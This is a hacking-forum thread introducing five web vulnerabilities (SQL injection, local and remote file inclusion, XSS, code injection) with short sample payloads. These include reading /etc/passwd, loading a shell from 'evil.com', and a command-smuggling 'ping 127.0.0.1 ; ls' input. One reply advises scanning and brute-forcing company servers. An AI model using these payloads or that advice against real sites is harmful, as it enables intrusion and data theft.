weclome to ic0de.ws Check here


Thread Rating:
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Top 5 Ways Your Website Can Be Breached !
#1
[Image: AvjSITi.png]

1. SQL injection
SQL injection :- This type of attack is very lethal because attacker injects malicious sql queries . And can dump sensitive info, Tamper data stored in database , change values , bypass vulnerable login pages.
Snip of the code

PHP Code:
statement "SELECT * FROM users WHERE users = '" userName "';"  

Code:
http://secretphpanel.example.com/artists.php?artist=1'

2. Local file inclusion (LFI)
Local file inclusion :- It is  generic version of directory transversal attack . what makes it so dangerous to a organization is attacker can read local files. Attacker can look for /etc/passwd, /etc/profiles read password.txt etc..
This how vulnerable url looks like
PHP Code:
/home.php?language=english 


PHP Code:
/home.php?language=/etc/passwd 
code snip

3. RFI ( remote file Intrusion)
Remote file inclusion :- LFI and RFI are similar attacking vectors .what makes RFI so dangerous is attacker can load backdoor ie php-shells form remote hosts

Code:
http://secretphpanel.example.com/test.php?members=evil.com/shell.php
 
code snip


4. xss (cross site scripting) 
Cross site scripting :-  i have posted a thread here Introduction to XSS
5. Remote code execution (RCE or ACE)
Remote code execution :-  Code Injection is a attack type where  injected  code  is interpreted/executed by the application. this happens because of poor php script code,data format and use of php eval () . often attacker can use it spawn a php reverse shell.
output below
[Image: AWRvWic.png?1]
i put following code
Code:
ping 127.0.0.1 ; ls
code snip using php eval() funcation


closing up if  find any errors or typos please HMU thank you
[Image: BezlSXT.gif]
Reply
#2
Nice thread now I know what can go wrong when I'm making a website. Lol thank you for adding vulnerable source snips
Reply
#3
You can also (sometimes) attack a companies website by first pinging it (example: ping www.google.com), scanning the ip with nmap (example: nmap -sV -a <ip of target>). If you see ports open like FTP (File Transfer Protocol) or SSH (Secure Shell), then you can possibly brute force the login and control the web server, upload and download files, etc. This can allow you to possibly find login database files, create php shells, or even destroy the whole website.
01001000 01100001 01100011 01101011 01100101 01110010 01101101 01100001 01101110 00101110 01110011 01101000
[-] The following 1 user Likes Hackerman.sh's post:
  • 0xadmin
Reply
#4
Brute force is out of scope for bug bounties
[-] The following 1 user Likes Xyt0's post:
  • 0xadmin
Reply
#5
Yeh, I agree. But it IS another way to breach websites, so that's why I posted it.
01001000 01100001 01100011 01101011 01100101 01110010 01101101 01100001 01101110 00101110 01110011 01101000
[-] The following 1 user Likes Hackerman.sh's post:
  • 0xadmin
Reply
#6
(10-06-2019, 07:21 PM)Hackerman.sh Wrote: Yeh, I agree. But it IS another way to breach websites, so that's why I posted it.
Agreed but this is more focused thread on web application vulnerabilities then OS or service onces. And Brute force is almost dead if you have strong passwords and fail2ban enabled!!
[Image: BezlSXT.gif]
Reply


Forum Jump:


Users browsing this thread: 1 Guest(s)